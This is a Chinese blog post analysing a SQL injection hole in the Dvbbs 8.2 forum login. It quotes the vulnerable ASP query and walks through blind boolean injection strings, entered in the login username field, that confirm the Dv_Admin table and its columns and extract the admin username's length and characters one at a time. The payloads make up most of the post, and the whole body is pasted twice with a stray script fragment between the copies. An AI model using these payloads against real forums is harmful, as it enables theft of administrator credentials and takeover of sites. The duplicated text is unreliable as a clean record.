Dvbbs 8.2 login_sql注入漏洞探析
2008-07-17 10:03
225 查看
挺无聊的,分析下”洞网/”,环境架好后.找到有问题的语句:
End If
Else
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
End If
变量username带入到查询语句如下:
If ChkUserLogin(username,password,mobile,usercookies,1)=false Then
Set chrs=Dvbbs.Execute("select Passport,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1")
If chrs.eof and chrs.bof Then
If Not ajaxPro Then
Dvbbs.AddErrCode(12)
Else
strString("本论坛不存在该用户名.@@@@0")'o
End If
Exit Function
End If
set chrs=nothing
End If
可以看到关键的语句就是这个了:
select Passport,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1
来构造语句:
where' and (select count(*) from Dv_Admin)>0 and '1'='1 //判断是否存在表名Dv_Admin
此语句在查询时,就会变成:
select Passport,IsChallenge from [Dv_User] where username=’ where' and (select count(*) from Dv_Admin)>0 and '1'='1 and IsChallenge=1
先来测试一下这个语句:
先注册一用户where
在文件logins.asp用户名里填入:
where' and (select count(*) from Dv_Admin)>0 and '1'='1
在密码处填入正确密码.
![](http://hiphotos.baidu.com/linuxetc/pic/item/4d28ab11964f2b6acb80c42f.jpg)
点登录,如果登录正常,说明,存在表单Dv_admin,
![](http://hiphotos.baidu.com/linuxetc/pic/item/5ffea199146cd71c6f068c39.jpg)
反之,如果出错提示,证明无此表单.
依此类推,构造语句:
where' and(select count(username) from Dv_admin)>0 and '1'='1
//判断是否存在列名username
where' and(select count(password) from Dv_admin)>0 and '1'='1
//判断是否存在列名password
where' and(select top 1 len(username) from dv_admin)>10 and '1'='1
where' and(select top 1 len(username) from dv_admin)<5 and '1'='1
where' and(select top 1 len(username) from dv_admin)=5 and '1'='1
//判断username列表值长度是否大于10,小于5,等于5
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)>100 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)<97 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)=97 and 1=1 and '1'='1
//判断username列表的第一位字母的ASCII码值是否大于100,小于97,等于97
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)>100 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)<97 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)=97 and 1=1 and '1'='1
//判断username列表的第二位字母的ASCII码值是否大于100,小于97,等于97
…….类推…
document.write('| 登录');
End If
Else
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
End If
变量username带入到查询语句如下:
If ChkUserLogin(username,password,mobile,usercookies,1)=false Then
Set chrs=Dvbbs.Execute("select Passport,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1")
If chrs.eof and chrs.bof Then
If Not ajaxPro Then
Dvbbs.AddErrCode(12)
Else
strString("本论坛不存在该用户名.@@@@0")'o
End If
Exit Function
End If
set chrs=nothing
End If
可以看到关键的语句就是这个了:
select Passport,IsChallenge from [Dv_User] where username='"&username&"' and IsChallenge=1
来构造语句:
where' and (select count(*) from Dv_Admin)>0 and '1'='1 //判断是否存在表名Dv_Admin
此语句在查询时,就会变成:
select Passport,IsChallenge from [Dv_User] where username=’ where' and (select count(*) from Dv_Admin)>0 and '1'='1 and IsChallenge=1
先来测试一下这个语句:
先注册一用户where
在文件logins.asp用户名里填入:
where' and (select count(*) from Dv_Admin)>0 and '1'='1
在密码处填入正确密码.
![](http://hiphotos.baidu.com/linuxetc/pic/item/4d28ab11964f2b6acb80c42f.jpg)
点登录,如果登录正常,说明,存在表单Dv_admin,
![](http://hiphotos.baidu.com/linuxetc/pic/item/5ffea199146cd71c6f068c39.jpg)
反之,如果出错提示,证明无此表单.
依此类推,构造语句:
where' and(select count(username) from Dv_admin)>0 and '1'='1
//判断是否存在列名username
where' and(select count(password) from Dv_admin)>0 and '1'='1
//判断是否存在列名password
where' and(select top 1 len(username) from dv_admin)>10 and '1'='1
where' and(select top 1 len(username) from dv_admin)<5 and '1'='1
where' and(select top 1 len(username) from dv_admin)=5 and '1'='1
//判断username列表值长度是否大于10,小于5,等于5
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)>100 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)<97 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,1,1)) from dv_admin)=97 and 1=1 and '1'='1
//判断username列表的第一位字母的ASCII码值是否大于100,小于97,等于97
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)>100 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)<97 and 1=1 and '1'='1
where' and (select top 1 asc(mid(username,2,1)) from dv_admin)=97 and 1=1 and '1'='1
//判断username列表的第二位字母的ASCII码值是否大于100,小于97,等于97
…….类推…
document.write('| 登录');
相关文章推荐
- Dvbbs8.2 access/sql 版login.asp远程sql注入
- dvbbs 8.2 SQL Injection注射漏洞分析
- dvbbs 8.2 SQL注射漏洞分析
- WordPress Simple Login Log插件SQL注入和多个HTML注入漏洞
- DVBBS 8.2 漏洞利用
- zzcms8.2 sql注入漏洞复现
- DVBBS 8.2 漏洞利用
- SQL注入漏洞入侵的过程及其防范措施
- ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
- SQL注入漏洞全接触
- SQL注入漏洞全接触
- SQL注入漏洞全接触--进阶篇
- 蓝雨设计整站SQL注入漏洞
- SQL注入天书--ASP注入漏洞全接触
- SQL注入漏洞全接触--高级篇
- SQL注入漏洞全接触--进阶篇
- SQL注入漏洞全接触—高级篇
- SQL注入天书 - ASP注入漏洞全接触
- 再爆hzhost6.5虚拟主机管理系统的SQL注入漏洞3
- SQL注入漏洞